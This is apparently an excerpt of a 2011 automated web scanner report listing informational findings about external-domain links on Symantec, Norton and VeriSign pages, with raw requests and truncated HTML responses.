Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true; s_nr=1315621909816-New; event69=event69; s_eVar70=%5B%5B'23440%253A0%253A0%252C'%2C'1315621909824'%5D%5D; s_sq=%5B%5BB%5D%5D; COUNTRY=US; LANGUAGE=EN; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:20; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:22 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 58568
Connection: Keep-Alive

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...
<div id="globalNavMainInner1">
<a href="http://www.symantec.com/norton">Norton</a>
...[SNIP]...
<div id="globalNavMainInner2">
<a href="http://www.symantec.com/business">Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href="http://www.symantec.com/partners">Partners</a>
...[SNIP]...
<div id="globalNavMainInner5">
<a href="http://www.symantec.com/about">About Symantec</a>
...[SNIP]...
<div class="lftNavMainNav">
<a href="http://www.symantec.com/norton/downloads/index.jsp" title="" class="lftNavArrowMargin"><span>
...[SNIP]...
<div class="lftNavMainNav">
<a title="" class=" lftNavArrowMargin" href="https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN">Find My Order </a>
...[SNIP]...
<li>
<a target="_parent" href="http://www.symantec.com/home_homeoffice/support/special/upgrade2007/">Norton Update Center</a>
...[SNIP]...
<div class="lwrTopLfPnl_link">
<a onclick="var w = window.open(href, '', 'scrollbars=yes,location=no,menuBar=no,resizable=no,status=no,toolbar=no,width=850,height=550,left=200,top=200'); if(w.blur) w.focus(); return false;" title="" href="http://www.symantec.com/norton/support/kb/web_view.jsp?wv_type=public_web&docurl=20080417101717EN">How do I find my version?</a>
...[SNIP]...
<div class="smallBusinessUpgrade positioning">
<a href="https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_estore">
                                   <img width="305" height="75" src="//buy-static.norton.com/estore/images/en/Non-Product/Ad_Objects/bnr_smb_renew_now_305.png"/>
...[SNIP]...
<span><a target="_blank" href="http://www.symantec.com/about/profile/policies/legal.jsp">Legal Notices</a>
...[SNIP]...
<span><a target="_blank" href="http://www.symantec.com/about/profile/policies/privacy.jsp">Privacy Policy</a>
...[SNIP]...
<span><a target="_blank" href="http://www.myNortonAccount.com ">Norton Account</a>
...[SNIP]...
<span><a target="_blank" href="http://www.symantec.com/about/profile/policies/eulas">License Agreements </a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a target="_blank" href="http://www.symantec.com/feedback/">Contact Us</a>
...[SNIP]...

14.4. http://community.norton.com/norton/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.norton.com
Path:   /norton/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /norton/?category.id=nis HTTP/1.1
Host: community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 61789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</link>    
       
           
       <link href="http://norton.i.lithium.com/skins/HEAD/C105409C876B69B68E91EDA257001258/nortonen1446997136.css" rel="stylesheet" type="text/css"></link>
   

           <link rel="shortcut icon" href="http://www.symantec.com/favicon.ico" type="image/x-icon" />


<meta name="om.environment" content="prod" />
...[SNIP]...
<![endif]-->

<script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"></script>

<script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_37" href="#"><img class="" id="display" src="http://norton.i.lithium.com/skins/images/C0E5B9B4C7EE14DAAFFEA36D02AE9AF5/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation lia-button-facebook" id="lithiumFacebookConnectIcon" href="/t5/Norton-Users-Discussion-Forum/ct-p/nis?category.id=nis"><img class="" id="display_0" src="http://norton.i.lithium.com/skins/images/BB41541B9291E6F322D353043685E371/base/images/button_fbconnect_secondary.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_43" href="/t5/Announcements/bd-p/Announcements"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_1" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_46" href="/t5/Norton-Internet-Security-Norton/bd-p/nis_feedback"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_2" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_49" href="/t5/Norton-360/bd-p/Norton_360"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_3" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_52" href="/t5/Norton-Online-Family/bd-p/OnlineFamily"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_4" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_55" href="/t5/Norton-for-Mac/bd-p/norton_mac"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_5" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_58" href="/t5/Norton-Online-Backup/bd-p/NOBU_forum"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_6" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_61" href="/t5/Other-Norton-Products/bd-p/other"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_7" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_64" href="/t5/Forum-Feedback/bd-p/forum_feedback"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_8" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<a class="lia-link-navigation board-icon" id="link_67" href="/t5/Product-Suggestions/bd-p/Suggestions"><img class="" title="Message Board" alt="There are no unread messages in this message board" id="display_9" src="http://norton.i.lithium.com/skins/images/9BDAABD6514BA78726F4E8812130CA3B/base/images/icon_board.png"/></a>
...[SNIP]...
<div style="margin-bottom: 10px; margin-top: 5px;"><a target="_blank" href="http://www.facebook.com/Norton"><img height="16" width="16" style="vertical-align: middle;" alt="Norton on Facebook" src="http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_facebook_16.gif"/></a> <a target="_blank" href="http://www.facebook.com/Norton">Be a fan on Facebook</a>
...[SNIP]...
<div style="margin-bottom: 10px;"><a target="_blank" href="http://www.youtube.com/Norton"><img height="16" width="16" style="vertical-align: middle;" alt="Subscribe on YouTube" src="http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_youtube_16.gif"/></a> <a target="_blank" href="http://www.youtube.com/Norton">Subscribe on YouTube</a>
...[SNIP]...
<div style="margin-bottom: 10px;"><a target="_blank" href="http://twitter.com/nortononline"><img height="16" width="16" style="vertical-align: middle;" alt="Follow us on Twitter" src="http://www.symantec.com/content/en/us/home_homeoffice/images/misc/icon_twitter_16.gif"/></a> <a target="_blank" href="http://twitter.com/nortonforumsUSA">Follow us on Twitter</a>
...[SNIP]...
<a target="_blank" href="http://de.community.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt="Deutsches Norton Forum" src="http://www.symantec.com/favicon.ico"/></a>
...[SNIP]...
<a target="_blank" href="http://fr.community.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt="Communaut.. Norton" src="http://www.symantec.com/favicon.ico"/></a>
...[SNIP]...
<a target="_blank" href="http://communityjp.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt="................................." src="http://www.symantec.com/favicon.ico"/></a>
...[SNIP]...
<a target="_blank" href="http://bbs.norton.com"><img height="16" width="16" style="vertical-align: middle;" alt=".................." src="http://www.symantec.com/favicon.ico"/></a>
...[SNIP]...
<span class="UserName lia-user-name">
               
       <img class="lia-user-rank-icon-left" title="Administrator" alt="Administrator" id="display_11" src="http://norton.i.lithium.com/i/rank_icons/admin.gif"/>    
       
           <a class="lia-link-navigation lia-page-link lia-user-name-link" style="color:#FF0000" target="_self" id="link_72" href="/t5/user/viewprofilepage/user-id/17">
...[SNIP]...
<div class="LithiumLogo lia-component-common-widget-lithium-logo" class="LithiumLogo">
   <a class="lia-link-navigation" title="Social CRM &amp; Community Solutions Powered by Lithium" target="_blank" id="lithiumLogoLink" href="http://www.lithium.com/"><img class="" title="Social CRM &amp; Community Solutions Powered by Lithium" alt="Powered by Lithium" id="display_12" src="http://norton.i.lithium.com/skins/images/36DAF0C87B7C6C4940B22274E6384D9C/base/images/button_lithium_logo.png"/></a>
...[SNIP]...
<!-- START OMNITURE JAVASCRIPT INCLUDES -->
<script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"></script>
<script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js"></script>
...[SNIP]...

14.5. http://investor.symantec.com/phoenix.zhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investor.symantec.com
Path:   /phoenix.zhtml

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /phoenix.zhtml?c=89422&p=irol-irhomeNews HTTP/1.1
Host: investor.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=58
Date: Fri, 09 Sep 2011 21:42:06 GMT
Content-Length: 39751
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD45LzkvMjAxMSA1OjQyOjA2IFBNPC90aW1lU3RhbXA+PHRpbWVUaWxsQ0NCTlJlZnJlc2g+NjA8L3RpbWVUaWxsQ0NCTlJlZnJl
...[SNIP]...
<link rel="stylesheet" type="text/css" href="client/89/89422/css/ccbnIR.css" /><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"></script>
...[SNIP]...
</div><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<noscript><img src="http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT_dis.gif" title="Javascript must be enabled to use this feature." border="0" /></noscript>
...[SNIP]...
<noscript><img src="http://media.corporate-ir.net/media_files/irol/global_images/icon_calDwnldIT_dis.gif" title="Javascript must be enabled to use this feature." border="0" /></noscript>
...[SNIP]...
<td width="100%" valign="middle"><a
class="ccbnLnk"

href="http://www.veracast.com/webcasts/citigroup/tech2011/22205132.cfm"
target="_new" >
Click here for webcast</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"
                       
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzNnxUeXBlPTI=&t=1"
target="_new">
Q1 FY12 Earnings New Release</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"
                       
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDE0NzIzNnxDaGlsZElEPTQzNDQzN3xUeXBlPTI=&t=1"
target="_new">
Q1 FY12 Supplemental Information</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"
                       
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxNDQ5fENoaWxkSUQ9LTF8VHlwZT0z&t=1"
target="_new">
Q1 2012 Earnings ... Prepared Remarks</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"
                       
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAxMDYyfENoaWxkSUQ9LTF8VHlwZT0z&t=1"
target="_new">
Historical Compares for Modified Segment Reporting</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"
                       
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MTAwMTU4fENoaWxkSUQ9LTF8VHlwZT0z&t=1"
target="_new">
Q1 FY12 Foreign Currency Update</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"
                       
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTM3ODl8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1"
target="_new">
Convertible Note Dilution FAQ</a>
...[SNIP]...
<td width="100%" valign="middle"><a
class="ccbnLnk"

href="http://www.media-server.com/m/acs/7b9834c9d1bb29b5dd8ae8afb63ff0c5"
target="_new" >
Click here for webcast</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"
                       
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTYxNHxUeXBlPTI=&t=1"
target="_new">
Presentation</a>
...[SNIP]...
<td align="center" valign="middle"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><a
                           class="ccbnTblLnk"
                       
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDEzNDQ0MXxDaGlsZElEPTQzMTY4OHxUeXBlPTI=&t=1"
target="_new">
Transcript</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank">Symantec...s Strategy</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank">Corporate Pitch</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank">Corporate Fact Sheet</a>
...[SNIP]...
<li><a href="http://www-us.computershare.com/default.asp?bhjs=1&amp;fla=1&amp;cc=CA&amp;lang=en" target="_blank">Shareholder Services (Computershare)</a>
...[SNIP]...
<li><a href="https://enroll1.icsdelivery.com/symc/Default.aspx" target="_blank">Request Electronic Delivery</a>
...[SNIP]...
</table><img src="http://media.corporate-ir.net/media_files/priv/ccbn/powered_edgar_online.gif" /></div>
...[SNIP]...

14.6. http://investor.symantec.com/phoenix.zhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investor.symantec.com
Path:   /phoenix.zhtml

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /phoenix.zhtml?c=89422&p=irol-EventDetails&EventId=3096751 HTTP/1.1
Host: investor.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 18700
Cache-Control: private, max-age=179
Date: Fri, 09 Sep 2011 21:42:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD45LzkvMjAxMSA1OjQyOjAzIFBNPC90aW1lU3Rh
...[SNIP]...
</script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"></script>
...[SNIP]...
<span class="ccbnTblTxt"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /><br />
...[SNIP]...
<td align="left" width="3%"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_win.gif" alt="Listen to the Webcast in Windows Media Player"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /><br />
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><a
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5NnxUeXBlPTI=&t=1"
target="_new">
Press Release</a>
...[SNIP]...
<td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><a
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM3NnxUeXBlPTI=&t=1"
target="_new">
Presentation</a>
...[SNIP]...
<td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><a
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9MzA5Njc1MXxDaGlsZElEPTM4MzM5OHxUeXBlPTI=&t=1"
target="_new">
FAQ</a>
...[SNIP]...
<td align="left" valign="top"><img border="0" src="http://www.corporate-ir.net/media_files/priv/CCBN/event_help/icons/md_pdf.gif" alt="Download Event Supporting Material"/>&#160;</td>
...[SNIP]...
<span class="ccbnTblTxt"><a
href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NDcwMTB8Q2hpbGRJRD0tMXxUeXBlPTM=&t=1"
target="_new">
Symantec to Acquire VeriSign...s Security Business Transcript</a>
...[SNIP]...
<BR><IMG src="http://www.corporate-ir.net/media_files/templates/webcast/tr_pwrby_hrz_rgb_pos.gif" alt=ThomsonReuters.com border=0 align=center VALIGN=TOP><BR>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9NjU1NDF8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank">Symantec...s Strategy</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTg4NjB8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank">Corporate Pitch</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODE1Njl8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank">Corporate Fact Sheet</a>
...[SNIP]...
<li><a href="http://www-us.computershare.com/default.asp?bhjs=1&amp;fla=1&amp;cc=CA&amp;lang=en" target="_blank">Shareholder Services (Computershare)</a>
...[SNIP]...
<li><a href="https://enroll1.icsdelivery.com/symc/Default.aspx" target="_blank">Request Electronic Delivery</a>
...[SNIP]...

14.7. https://knowledge.verisign.ch/support/code-signing-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/code-signing-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /support/code-signing-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<p id="site_logo">
       <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo">
           <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">
...[SNIP]...
<li><a href="//www.verisign.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="//www.verisign.com.au/">Australia</a>
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisign.com.br/">Brazil</a>
...[SNIP]...
<li><a href="//www.verisign.com/ca/">Canada</a>
...[SNIP]...
<li><a href="//www.verisign.com/cl/">Chile</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.com.hk/">Hong Kong</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.co.jp/">Japan</a>
...[SNIP]...
<li><a href="//www.verisign.com/latinamerica/esp/">Latin America</a>
...[SNIP]...
<li><a href="//www.verisign.com/mx/">Mexico</a>
...[SNIP]...
<li><a href="//www.verisign.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="//www.verisign.co.nz/">New Zealand</a>
...[SNIP]...
<li><a href="//www.verisign.com.sg/">Singapore</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.com.tw/">Taiwan</a>
...[SNIP]...
<li><a href="//www.verisign.com/">United States</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"
               type="text/javascript">
</script>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps">
                       Two-Factor Authentication</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
                           Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps">
                               Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to">
                                               Detect Fraud Online</a>
...[SNIP]...
<a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo">
           <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"></a>
...[SNIP]...
<p class="small">
                                   <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external">Email support for
                                       login help.</a>
...[SNIP]...
</div>
       <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo">
           <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"></a>
...[SNIP]...
<a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo">
           <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"></a>
...[SNIP]...
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...
<li><a href="https://products.verisign.com/geocenter/reseller/logon.do">VeriSign Partner Center Sign In</a>
...[SNIP]...
